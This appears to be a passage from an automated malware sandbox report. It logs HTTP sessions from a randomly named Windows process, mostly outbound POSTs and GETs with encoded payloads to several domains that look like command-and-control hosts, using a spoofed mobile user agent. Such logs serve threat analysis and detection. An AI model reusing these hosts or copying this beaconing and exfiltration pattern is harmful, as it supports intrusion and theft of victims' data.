Sep 26, 2024 14:24:45.001503944 CEST	1236	IN	Data Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72 65 6e 74 53 74 79 Data Ascii: setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTMLcurrentStylesheet.s
Sep 26, 2024 14:24:45.001539946 CEST	125	IN	Data Raw: 65 6d 65 6e 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 74 61 67 4e 61 6d 65 20 21 3d 3d 20 27 48 45 41 44 27 20 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 20 73 74 79 6c 65 53 68 65 65 74 45 Data Ascii: ement.parentElement.tagName !== 'HEAD' ) {document.head.append( styleSheetElement )}}}</script>
Sep 26, 2024 14:24:45.021327019 CEST	1236	IN	Data Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65 Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
Sep 26, 2024 14:24:45.021399021 CEST	1236	IN	Data Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77 Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width:33px;height:33px;m
Sep 26, 2024 14:24:45.021449089 CEST	1236	IN	Data Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 Data Ascii: apper[class="tve-custom-menu-switch-icon-"] ul.tve_w_menu li{background-color:inherit;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"] ul.tve_w_menu ul{display:none;position:relative;width:100%;left:0px;top:0px;}.thrv_wi
Sep 26, 2024 14:24:45.021482944 CEST	672	IN	Data Raw: 32 35 35 29 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 5b 63 6c 61 73 73 2a Data Ascii: 255);}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"][class="light-tmp"] ul.tve_w_menu .sub-menu{box-shadow:none;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"][class="light-tmp"] ul.tve_w_menu li
Sep 26, 2024 14:24:45.021514893 CEST	1236	IN	Data Raw: 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 20 3e 20 61 7b 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 Data Ascii: ul.tve_w_menu li > a{color:rgb(255,255,255);}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown ul.tve_w_menu{height:auto;max-height:0px;opacity:0;left:0px;overflow:hidden;width:100%;position:absolute;tr
Sep 26, 2024 14:24:45.021562099 CEST	1236	IN	Data Raw: 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 64 72 6f 70 64 6f 77 6e 20 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 2e 74 76 65 2d 74 72 69 67 67 65 72 65 64 2d 69 63 6f 6e 20 2e 74 63 62 2d 69 63 6f 6e 2d 6f 70 65 6e 7b 6f 70 61 63 69 74 79 3a Data Ascii: n-"].tve-mobile-dropdown .tve-m-trigger.tve-triggered-icon .tcb-icon-open{opacity:0;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"].tve-mobile-side-right ul.tve_w_menu,.thrv_widget_menu.thrv_wrapper[class="tve-custom-me
Sep 26, 2024 14:24:45.021595001 CEST	1236	IN	Data Raw: 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 66 75 6c 6c 73 63 72 65 65 6e 20 75 6c 2e 74 Data Ascii: hrv_wrapper[class="tve-custom-menu-switch-icon-"].tve-mobile-side-fullscreen ul.tve_w_menu::-webkit-scrollbar-track{background:transparent;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"].tve-mobile-side-right ul.tve_w_m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	44.213.25.70	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:46.152618885 CEST	10843	OUT	POST /paa2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.newdaydawning.net Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.newdaydawning.net Referer: http://www.newdaydawning.net/paa2/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 71 35 4e 59 71 2b 43 54 4a 6b 41 52 6f 53 50 4f 54 4a 2f 34 47 37 77 44 7a 33 6d 47 66 65 54 4a 41 73 46 38 38 73 76 37 37 6c 71 6c 58 71 6e 33 4c 35 2f 36 67 2b 7a 71 4d 30 2b 4b 4d 4f 72 33 41 78 31 66 4f 2b 67 4a 71 39 54 68 32 63 6b 51 36 6a 79 42 49 65 34 64 48 48 41 71 43 66 4c 66 64 35 6a 33 44 67 63 39 77 71 30 51 6c 4a 64 35 37 4e 45 2f 30 6c 34 6f 33 31 4d 68 70 68 30 78 41 65 6d 71 63 2b 4c 62 2b 6f 4d 6c 49 6d 42 57 6b 70 55 4b 4e 55 76 53 5a 2b 2f 32 64 33 44 48 59 4c 63 35 42 4b 52 41 61 6d 77 46 4d 4d 69 45 68 57 53 79 4d 61 39 6e 4e 65 78 36 75 66 71 74 6d 56 4d 62 65 37 76 37 46 6c 6a 37 51 63 6b 45 4b 4a 52 54 4e 73 2f 57 48 39 65 79 73 48 54 56 62 52 72 68 51 6c 43 38 36 75 44 6d 49 71 77 76 77 33 57 49 48 38 50 46 50 45 55 35 55 62 6f 75 56 39 4d 6b 6a 51 46 61 44 51 4c 57 4f 76 51 38 49 45 48 73 2b 55 6d 5a 6b 34 30 6f 37 44 69 42 64 70 6f 32 72 4e 58 68 79 7a 54 4c 2b 4d 4d 6e 5a 68 4b 36 6a 69 72 59 33 6c 71 51 4f 34 34 2f 7a 57 58 45 39 72 6f 42 4d 48 4c [TRUNCATED] Data Ascii: sL9tFJ=q5NYq+CTJkARoSPOTJ/4G7wDz3mGfeTJAsF88sv77lqlXqn3L5/6g+zqM0+KMOr3Ax1fO+gJq9Th2ckQ6jyBIe4dHHAqCfLfd5j3Dgc9wq0QlJd57NE/0l4o31Mhph0xAemqc+Lb+oMlImBWkpUKNUvSZ+/2d3DHYLc5BKRAamwFMMiEhWSyMa9nNex6ufqtmVMbe7v7Flj7QckEKJRTNs/WH9eysHTVbRrhQlC86uDmIqwvw3WIH8PFPEU5UbouV9MkjQFaDQLWOvQ8IEHs+UmZk40o7DiBdpo2rNXhyzTL+MMnZhK6jirY3lqQO44/zWXE9roBMHLED31wxmXnJCsaI1viBKz1qz7LDGQGKG9+SQo9wfQn9RsGESMWHnhDRDk1m2CpbuEkiHzG1xa8RQwkBmS5/n75STx3cAeQ/dtkEX4Xp720J5LNFOQPtpb/tl6gZwuMYuj3fMohsiwmX8hSSoWduEGsTXmNRUb9BZMQexFBViCPOrH5miBieAc6f2cASPUsCwpXeZRsH8ZHi+mjYU+nat+vOswcQdHG/EV+5KThJLCRRn0bOciiJ+pCumHq0eA3yvUzgWiXPETLktZwPDzlQ9mQO4XYrPTAa+dtfg+c3PCDtVXKOZAQXIHXy8PkkuWxqN93ESeslCf+jLBn+Zrn1xxOVe+jj1Juao5bkrJOmnyY9QJJzBFVziRYQh/2/tLax04kEBPqu74KQxQCcwEkA9owtukgZWrXbUdtkuJGDoUc6qa3u1tPW3ebuzNg0YXif924oC1XffxSyaNHnCWLuJu2hNCb2XQb7b0EMa6WPozENF09EfBVZt8rY2kEy90sG9lSMe6B1VgdAly9mwbVFnQV4AGJKNsVQwNyzuWQbM3jQREmNtehMe02to3vGFWyupmaT0TPtnLQdonuRlW6vjetPVh0sRAM2D2GB0NZ5r2DsZqZeuofZ727rpPedRP2pIVeTr2sy0v0oACRTdqLYLNnFyKryV5CL2euu [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	44.213.25.70	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:48.694894075 CEST	465	OUT	GET /paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo+nz+dFs7xbp1eoNPi6Q2eN5D+KpvM2vqKME65A47EEAJHO8M7tvWjwt8QkxqADfIieF9YUtvuZ7jYHQQX8NIphqxPsvx6gn4=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.newdaydawning.net Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:24:50.049865961 CEST	477	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 26 Sep 2024 12:24:49 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://newdaydawning.net/paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo+nz+dFs7xbp1eoNPi6Q2eN5D+KpvM2vqKME65A47EEAJHO8M7tvWjwt8QkxqADfIieF9YUtvuZ7jYHQQX8NIphqxPsvx6gn4=&gB7t=xFqX1hC8 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Sep 26, 2024 14:24:50.074368000 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49756	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:55.134560108 CEST	741	OUT	POST /pt4m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.theclydefund.info Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.theclydefund.info Referer: http://www.theclydefund.info/pt4m/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 74 76 41 61 77 77 38 37 4c 6d 39 6a 4a 66 50 33 6f 4b 4f 6e 68 78 78 4c 78 54 56 64 4c 6c 70 73 4c 37 49 52 71 6f 55 4c 6f 36 4f 6d 6a 36 67 35 6c 2f 52 58 63 4d 71 69 44 49 47 46 38 36 30 6e 62 4d 50 41 47 69 63 4d 79 79 32 6c 74 42 50 4a 69 37 6e 68 63 4b 77 2f 72 31 6e 37 71 38 54 49 4a 70 69 41 6a 33 46 66 4d 63 58 32 37 4e 49 6b 6d 4a 5a 6c 41 37 4b 58 64 71 42 4e 39 52 6b 4b 41 68 4c 61 79 56 35 61 39 74 68 58 6e 33 6a 59 5a 7a 58 58 53 49 39 67 44 54 46 2b 64 51 2b 50 54 49 53 78 78 68 37 71 37 2f 42 37 4c 2f 61 71 32 47 4b 66 6e 43 63 33 72 77 31 4e 59 2b 6c 4f 61 77 3d 3d Data Ascii: sL9tFJ=tvAaww87Lm9jJfP3oKOnhxxLxTVdLlpsL7IRqoULo6Omj6g5l/RXcMqiDIGF860nbMPAGicMyy2ltBPJi7nhcKw/r1n7q8TIJpiAj3FfMcX27NIkmJZlA7KXdqBN9RkKAhLayV5a9thXn3jYZzXXSI9gDTF+dQ+PTISxxh7q7/B7L/aq2GKfnCc3rw1NY+lOaw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49757	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:57.682172060 CEST	761	OUT	POST /pt4m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.theclydefund.info Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.theclydefund.info Referer: http://www.theclydefund.info/pt4m/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 74 76 41 61 77 77 38 37 4c 6d 39 6a 49 37 7a 33 71 70 57 6e 32 42 78 4b 2b 7a 56 64 46 46 70 6f 4c 37 45 52 71 6f 38 62 6f 4d 6d 6d 6a 62 51 35 6b 39 35 58 66 4d 71 69 62 34 47 45 2f 4b 30 53 62 4e 7a 49 47 6e 6b 4d 79 79 4b 6c 74 42 2f 4a 69 4d 4c 69 63 61 77 39 6e 56 6e 6c 75 38 54 49 4a 70 69 41 6a 7a 70 31 4d 63 2f 32 34 39 34 6b 6d 73 31 6b 49 62 4b 57 61 71 42 4e 35 52 6b 4f 41 68 4c 6f 79 55 55 53 39 76 5a 58 6e 32 54 59 5a 6d 37 55 42 6f 39 36 48 54 45 2f 63 53 6a 74 65 37 58 6c 34 42 7a 4a 30 66 78 41 4f 35 4c 77 6e 33 72 49 31 43 34 45 32 33 38 35 56 39 59 48 42 79 61 6c 32 76 6e 38 37 63 33 4c 33 50 52 30 5a 6c 44 55 32 54 38 3d Data Ascii: sL9tFJ=tvAaww87Lm9jI7z3qpWn2BxK+zVdFFpoL7ERqo8boMmmjbQ5k95XfMqib4GE/K0SbNzIGnkMyyKltB/JiMLicaw9nVnlu8TIJpiAjzp1Mc/2494kms1kIbKWaqBN5RkOAhLoyUUS9vZXn2TYZm7UBo96HTE/cSjte7Xl4BzJ0fxAO5Lwn3rI1C4E2385V9YHByal2vn87c3L3PR0ZlDU2T8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49758	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:00.226877928 CEST	10843	OUT	POST /pt4m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.theclydefund.info Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.theclydefund.info Referer: http://www.theclydefund.info/pt4m/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 74 76 41 61 77 77 38 37 4c 6d 39 6a 49 37 7a 33 71 70 57 6e 32 42 78 4b 2b 7a 56 64 46 46 70 6f 4c 37 45 52 71 6f 38 62 6f 4d 75 6d 67 74 45 35 6c 61 6c 58 65 4d 71 69 46 49 47 4a 2f 4b 30 4c 62 4d 62 4d 47 6e 67 6d 79 33 47 6c 75 67 66 4a 6b 2b 7a 69 57 61 77 39 34 6c 6e 34 71 38 54 64 4a 74 4f 2b 6a 33 4a 31 4d 63 2f 32 34 2b 67 6b 32 70 5a 6b 46 37 4b 58 64 71 42 52 39 52 6b 71 41 69 36 64 79 55 68 77 2b 65 35 58 6d 57 44 59 62 55 6a 55 62 6f 39 6b 41 54 46 73 63 53 76 62 65 34 7a 70 34 41 33 7a 30 63 74 41 4f 4e 4f 36 2b 32 48 31 6a 41 38 57 74 32 38 44 4e 4f 73 6c 59 42 75 6a 6e 4e 37 32 6b 2f 50 61 76 66 77 34 46 33 50 6f 6a 45 66 2f 49 46 65 68 38 76 34 4e 30 65 6f 4f 55 56 55 4f 67 49 65 64 50 61 34 31 6b 4c 64 34 59 6e 6d 78 65 75 4a 4c 62 66 6a 78 67 71 31 43 5a 30 39 31 74 65 37 56 59 63 6c 58 4f 44 72 37 2b 38 6b 70 6f 48 5a 54 6f 53 75 63 6a 78 31 67 5a 6a 6b 30 2b 55 63 37 41 2b 6f 7a 56 46 2f 45 74 70 66 4b 36 57 2f 4d 4a 58 66 52 4e 70 4e 65 59 79 57 46 2b 5a 4d [TRUNCATED] Data Ascii: sL9tFJ=tvAaww87Lm9jI7z3qpWn2BxK+zVdFFpoL7ERqo8boMumgtE5lalXeMqiFIGJ/K0LbMbMGngmy3GlugfJk+ziWaw94ln4q8TdJtO+j3J1Mc/24+gk2pZkF7KXdqBR9RkqAi6dyUhw+e5XmWDYbUjUbo9kATFscSvbe4zp4A3z0ctAONO6+2H1jA8Wt28DNOslYBujnN72k/Pavfw4F3PojEf/IFeh8v4N0eoOUVUOgIedPa41kLd4YnmxeuJLbfjxgq1CZ091te7VYclXODr7+8kpoHZToSucjx1gZjk0+Uc7A+ozVF/EtpfK6W/MJXfRNpNeYyWF+ZMIKxLZopXTLWiwt1u8ADeAlTo1k964sdpDNQdtIm/nEF08aCLbbM87INdGTjZMsImQ/Uwv8JRKWPZ4CrAOXho/Dy8LVisziA8j8Jh+WE/tordfv5O90eGWaEZRkgmQxYjiJqqqIWw/MOpoghWDZlRL6QqMndqMYHwSQ3XYKUnWyH6rsUAVPmdAbxDO+cjtXQtU1WvC4yLUhnTj77y53+vIaNORp9VJQ5bR8PXR+TCsFAPOXl23lzB3RLy4Ty6vUbskP2RNzaWY4Hu5tSQD4MekEu079h+himAfpRig0z1ZhnzZ3q9BU9ctYEPLWpQJ9vm9r7eqxqqgyQwzU/xqHB6bxhVwUjmrx4QFieFGmNKeeQN+KcxT5g29C/Guokl+ec+zSntS+ZpgcZjlSGMn/+bgMfBeoqCoNWnYej30nBzo4d5AzecUUny6hQKPhYwuS1Ve201ajOd9kWVjxNLGQTxwjMPdzAr1lPrEedkECVvbcWLPJFUBSt200Mu2RfEr0CLvXY52cjKe3CDMOaiSkWgdeodGj6IwmnszXf5U+BXSPpED/C777fnuvUIJv5xS4/x1eXRIyzKcQtXMArvDGLi+nDCmptOIOfcqK9xZtCjnBOADfmjGbEvP+N9rE3oQ2OnZuPTjG4C+cUbgQl3s49Ve4blkI9XAKvvh8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49759	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:02.771380901 CEST	465	OUT	GET /pt4m/?sL9tFJ=gto6zAZEImMHeJ+LpJq54hk6oy5OM0JeZOEv9IoNosKW45cXkvVUXc/PKOyk1O8wCdnCAQISoXLeySDC7Pr7VLt7iUiMsNXrOKCvlG99AM7B8PQExMggQoQ=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.theclydefund.info Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:25:03.263964891 CEST	396	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 12:25:03 GMT Content-Type: text/html Content-Length: 256 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 4c 39 74 46 4a 3d 67 74 6f 36 7a 41 5a 45 49 6d 4d 48 65 4a 2b 4c 70 4a 71 35 34 68 6b 36 6f 79 35 4f 4d 30 4a 65 5a 4f 45 76 39 49 6f 4e 6f 73 4b 57 34 35 63 58 6b 76 56 55 58 63 2f 50 4b 4f 79 6b 31 4f 38 77 43 64 6e 43 41 51 49 53 6f 58 4c 65 79 53 44 43 37 50 72 37 56 4c 74 37 69 55 69 4d 73 4e 58 72 4f 4b 43 76 6c 47 39 39 41 4d 37 42 38 50 51 45 78 4d 67 67 51 6f 51 3d 26 67 42 37 74 3d 78 46 71 58 31 68 43 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sL9tFJ=gto6zAZEImMHeJ+LpJq54hk6oy5OM0JeZOEv9IoNosKW45cXkvVUXc/PKOyk1O8wCdnCAQISoXLeySDC7Pr7VLt7iUiMsNXrOKCvlG99AM7B8PQExMggQoQ=&gB7t=xFqX1hC8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:08.325289011 CEST	744	OUT	POST /dt20/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.crowsecurity.cloud Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.crowsecurity.cloud Referer: http://www.crowsecurity.cloud/dt20/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 75 4f 62 2f 54 57 34 31 44 78 47 63 30 34 51 36 4b 70 68 2b 77 6f 43 6d 78 51 4d 52 77 41 4c 64 70 65 4e 43 72 2f 74 53 4a 48 5a 57 56 6c 6d 73 32 4a 79 6d 6b 55 64 61 4a 79 44 44 50 57 70 47 6e 33 61 63 44 49 76 37 50 5a 42 6a 72 57 4c 72 6f 53 4c 58 2f 6b 76 35 6e 5a 39 61 54 76 39 36 4e 56 50 67 57 64 2f 71 4b 73 45 6f 4a 44 6b 72 58 39 71 50 42 4e 4f 5a 75 6f 50 58 6c 56 69 56 7a 31 41 37 6d 51 4f 48 46 55 72 76 43 68 33 34 59 57 79 34 30 30 79 37 43 77 34 6b 78 62 67 58 54 50 52 4a 73 4a 6a 51 6c 54 31 33 48 6b 2f 50 4d 31 34 6c 43 71 48 69 75 38 47 6b 37 66 32 4f 4e 51 3d 3d Data Ascii: sL9tFJ=uOb/TW41DxGc04Q6Kph+woCmxQMRwALdpeNCr/tSJHZWVlms2JymkUdaJyDDPWpGn3acDIv7PZBjrWLroSLX/kv5nZ9aTv96NVPgWd/qKsEoJDkrX9qPBNOZuoPXlViVz1A7mQOHFUrvCh34YWy400y7Cw4kxbgXTPRJsJjQlT13Hk/PM14lCqHiu8Gk7f2ONQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49761	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:10.869688988 CEST	764	OUT	POST /dt20/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.crowsecurity.cloud Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.crowsecurity.cloud Referer: http://www.crowsecurity.cloud/dt20/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 75 4f 62 2f 54 57 34 31 44 78 47 63 32 59 41 36 49 4b 4a 2b 31 49 43 68 30 51 4d 52 35 67 4c 6e 70 65 42 43 72 36 56 43 49 31 39 57 57 45 57 73 33 4e 75 6d 70 30 64 61 52 69 44 61 43 32 70 42 6e 33 6e 76 44 4d 76 37 50 5a 6c 6a 72 54 33 72 70 6c 6e 55 77 55 76 37 71 35 39 63 64 50 39 36 4e 56 50 67 57 65 43 33 4b 6f 67 6f 4a 53 55 72 57 63 71 41 43 4e 4f 61 34 59 50 58 76 31 69 52 7a 31 42 6f 6d 53 71 74 46 57 54 76 43 68 6e 34 59 45 4b 33 39 30 7a 77 50 51 35 51 2b 35 31 42 52 76 78 59 6e 4b 33 69 6a 7a 73 61 43 69 75 56 64 45 5a 79 51 71 6a 52 7a 37 50 51 32 63 4c 48 57 52 39 69 62 48 37 2f 5a 46 49 54 6b 56 4b 56 54 49 7a 42 4a 66 77 3d Data Ascii: sL9tFJ=uOb/TW41DxGc2YA6IKJ+1ICh0QMR5gLnpeBCr6VCI19WWEWs3Nump0daRiDaC2pBn3nvDMv7PZljrT3rplnUwUv7q59cdP96NVPgWeC3KogoJSUrWcqACNOa4YPXv1iRz1BomSqtFWTvChn4YEK390zwPQ5Q+51BRvxYnK3ijzsaCiuVdEZyQqjRz7PQ2cLHWR9ibH7/ZFITkVKVTIzBJfw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49762	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
